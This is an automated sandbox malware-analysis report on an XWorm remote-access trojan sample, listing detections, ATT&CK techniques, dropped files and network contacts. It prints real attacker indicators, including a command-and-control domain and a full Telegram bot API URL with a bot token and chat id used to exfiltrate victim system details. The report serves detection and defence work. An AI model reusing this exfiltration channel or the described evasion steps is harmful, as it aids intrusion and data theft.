                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: NzEsfIiAc0.exe, 00000000.00000002.3393667557.0000000000815000.00000004.00000020.00020000.00000000.sdmp, NzEsfIiAc0.exe, 00000000.00000002.3430786927.000000001B5DD000.00000004.00000020.00020000.00000000.sdmp, NzEsfIiAc0.exe, 00000000.00000002.3430786927.000000001B68A000.00000004.00000020.00020000.00000000.sdmp, NzEsfIiAc0.exe, 00000000.00000002.3430786927.000000001B64A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: Process Memory Space: NzEsfIiAc0.exe PID: 3576, type: MEMORYSTR
                      Yara detected XWorm
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: NzEsfIiAc0.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NzEsfIiAc0.exe PID: 3576, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: Process Memory Space: NzEsfIiAc0.exe PID: 3576, type: MEMORYSTR
                      Yara detected XWorm
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: NzEsfIiAc0.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NzEsfIiAc0.exe PID: 3576, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Windows Management Instrumentation                      		2
                      Registry Run Keys / Startup Folder                      		11
                      Process Injection                      		1
                      Masquerading                      		1
                      Input Capture                      		221
                      Security Software Discovery                      		Remote Services1
                      Input Capture                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      PowerShell                      		1
                      DLL Side-Loading                      		2
                      Registry Run Keys / Startup Folder                      		11
                      Disable or Modify Tools                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		131
                      Virtualization/Sandbox Evasion                      		Security Account Manager131
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture1
                      Ingress Tool Transfer                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      File and Directory Discovery                      		SSHKeylogging2
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Obfuscated Files or Information                      		Cached Domain Credentials13
                      System Information Discovery                      		VNCGUI Input Capture13
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1512625 Sample: NzEsfIiAc0.exe Startdate: 17/09/2024 Architecture: WINDOWS Score: 100 32 api.telegram.org 2->32 34 paul-vocational.gl.at.ply.gg 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 48 17 other signatures 2->48 8 NzEsfIiAc0.exe 14 6 2->8         started        signatures3 46 Uses the Telegram API (likely for C&C communication) 32->46 process4 dnsIp5 36 api.telegram.org 149.154.167.220, 443, 49719 TELEGRAMRU United Kingdom 8->36 38 paul-vocational.gl.at.ply.gg 147.185.221.21, 49721, 49724, 49725 SALSGIVERUS United States 8->38 30 C:\Users\user\AppData\Roaming\XClient.exe, PE32 8->30 dropped 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->50 52 Protects its processes via BreakOnTermination flag 8->52 54 Bypasses PowerShell execution policy 8->54 56 Adds a directory exclusion to Windows Defender 8->56 13 powershell.exe 23 8->13         started        16 powershell.exe 23 8->16         started        18 powershell.exe 23 8->18         started        20 powershell.exe 8->20         started        file6 signatures7 process8 signatures9 58 Loading BitLocker PowerShell Module 13->58 22 conhost.exe 13->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      NzEsfIiAc0.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                      NzEsfIiAc0.exe100%AviraTR/Spy.Gen
                      NzEsfIiAc0.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\XClient.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Roaming\XClient.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\XClient.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWorm

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://api.telegram.org0%Avira URL Cloudsafe
                      paul-vocational.gl.at.ply.gg0%Avira URL Cloudsafe
                      http://crl.m0%Avira URL Cloudsafe
                      http://crl.micft.cMicRosof0%Avira URL Cloudsafe
                      https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.60%Avira URL Cloudsafe
                      http://crl.mic0%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                      https://api.telegram.org/bot0%Avira URL Cloudsafe
                      http://www.microsoft.co0%Avira URL Cloudsafe
                      https://nt.C0%Avira URL Cloudsafe
                      https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=637860%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truetrue
                        		unknown
                        paul-vocational.gl.at.ply.gg
                        		147.185.221.21
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          paul-vocational.gl.at.ply.ggtrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2235529090.000001535232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2330121656.000001921C08F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2470760532.000001A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.mpowershell.exe, 00000002.00000002.2242258397.000001535A9AE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.orgNzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/botNzEsfIiAc0.exe, XClient.exe.0.drtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2219535625.00000153424E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C24A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2219535625.00000153424E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C24A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2235529090.000001535232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2330121656.000001921C08F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2470760532.000001A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.microsoft.copowershell.exe, 00000002.00000002.2242258397.000001535A9AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.micpowershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2686027389.000002DDB9CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.micft.cMicRosofpowershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2686027389.000002DDB9CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2219535625.00000153422C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA1691000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nt.Cpowershell.exe, 0000000D.00000002.2690372644.000002DDB9EB8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2219535625.00000153422C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA1691000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=63786NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          147.185.221.21
                          		paul-vocational.gl.at.ply.ggUnited States
                          		12087SALSGIVERUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1512625
                          Start date and time:2024-09-17 17:24:30 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 59s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:15
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:NzEsfIiAc0.exe
                          renamed because original name is a hash value
                          Original Sample Name:0b80b6d2e6b7330c1f917dc01d612f6f314630edc8d05f3831689865990dcba5.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@13/20@2/2
                          EGA Information:
                          • Successful, ratio: 20%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 43
                          • Number of non-executed functions: 7
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 1280 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 1816 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 5912 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 6920 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: NzEsfIiAc0.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          11:25:39API Interceptor52x Sleep call for process: powershell.exe modified
                          11:26:36API Interceptor168859x Sleep call for process: NzEsfIiAc0.exe modified
                          17:26:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220Y666Gn09a1.exeGet hashmaliciousXWormBrowse
                            MV. VISHVA EKTA - VESSEL PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              ship particulars_M.V FAROUK M.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                Invoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  hesaphareketi-01_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    https://cdnnombd.elementor.cloud/ca.htmlGet hashmaliciousUnknownBrowse
                                      Quotation QT-433.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        Shipping Document.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          OTPAuthenticator.wsfGet hashmaliciousAsyncRATBrowse
                                            TT USD 170,196 - 16.9.2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              147.185.221.21Y666Gn09a1.exeGet hashmaliciousXWormBrowse
                                                Uhj9qfwbYG.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                  WIN CHANGER 2.3.exeGet hashmaliciousXWormBrowse
                                                    jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
                                                      PCCooker2.0_x64.exeGet hashmaliciousAsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRatBrowse
                                                        JFhDGHXmW6.exeGet hashmaliciousUnknownBrowse
                                                          N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                                            N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                                              SenditIllrunitinmyvirtualmachineinsidemyvirtualmachine.batGet hashmaliciousUnknownBrowse
                                                                Image Logger Installer.exeGet hashmaliciousAsyncRAT, XWormBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  api.telegram.orgY666Gn09a1.exeGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  MV. VISHVA EKTA - VESSEL PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  ship particulars_M.V FAROUK M.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Invoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  hesaphareketi-01_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  https://cdnnombd.elementor.cloud/ca.htmlGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  Quotation QT-433.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Shipping Document.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  OTPAuthenticator.wsfGet hashmaliciousAsyncRATBrowse
                                                                  • 149.154.167.220
                                                                  TT USD 170,196 - 16.9.2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TELEGRAMRUY666Gn09a1.exeGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  Unlock_Tool_5.8.exeGet hashmaliciousVidarBrowse
                                                                  • 149.154.167.99
